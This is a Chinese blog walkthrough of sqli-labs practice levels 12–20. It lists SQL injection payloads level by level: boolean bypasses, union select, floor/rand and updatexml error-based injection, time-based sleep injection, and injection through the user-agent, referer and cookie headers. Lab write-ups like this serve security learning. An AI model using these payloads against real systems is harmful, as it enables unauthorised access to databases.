less12-less20()

本文详细介绍了多种SQL注入攻击手法,包括user_agent、referer和cookie注入,展示了利用注入漏洞获取数据库信息的过程。同时,列举了不同类型的注入语句,如order by、union select和错误报错注入等,用于探测数据库结构和版本信息。针对无回显场景,提出了报错注入的解决策略。文章还提醒读者关注SQL注入的防范措施,确保系统安全。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

总结

user_agent注入
referer注入
cookie注入
updatexml()报错注入

less12

用户名密码输入

a") or ("1"="1

得到一个账户Dumb、Dumb。
用户名密码处分别输入计算出行数

Dumb") and ("1"="1
Dumb") and 1=1 order by 2-- 

输入

Dumb") and ("1"="2
Dumb") and 1=2 union select 1,2-- 

输入

Dumb") and ("1"="2
Dumb") and 1=2 union select @@version,2-- 

less13

因为页面无回显,所以采用报错注入。

  1. 用户名密码输入
7') or ('1')=('1
7') or 1=1 order by 2-- 
7') or ('1')=('1
7') or 1=1 union select concat(left(rand(),3),'>',@@version),count(*) from information_schema.tables group by 1-- `

less14

双引号
1.

7" or "1"="1
7" or 1=1 order by 2-- 
7" or "1"="1
7" or 1=1 union select concat(left(rand(),3),'>',@@version),count(*) from information_schema.tables group by 1-- 

less15

123
1' or 1=1 and sleep(5)-- 

2.得到数据库长度

//用户名处输入任意数
1' or 1=1 and if(length(database())>1,sleep(5),1)-- 

less16

1") or 1=1 order by 2-- 
1") or length(database())>0-- 

less17()

Dumb
Dumb' and updatexml(1,concat('>',database(),'>'),1)-- 

less18()

user_agent注入

' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1

在这里插入图片描述

less19##

referer注入

 ' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1

在这里插入图片描述

less20

cookie注入

uname=admin' and updatexml(1,concat(0x7e,database(),0x7e),1)#

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值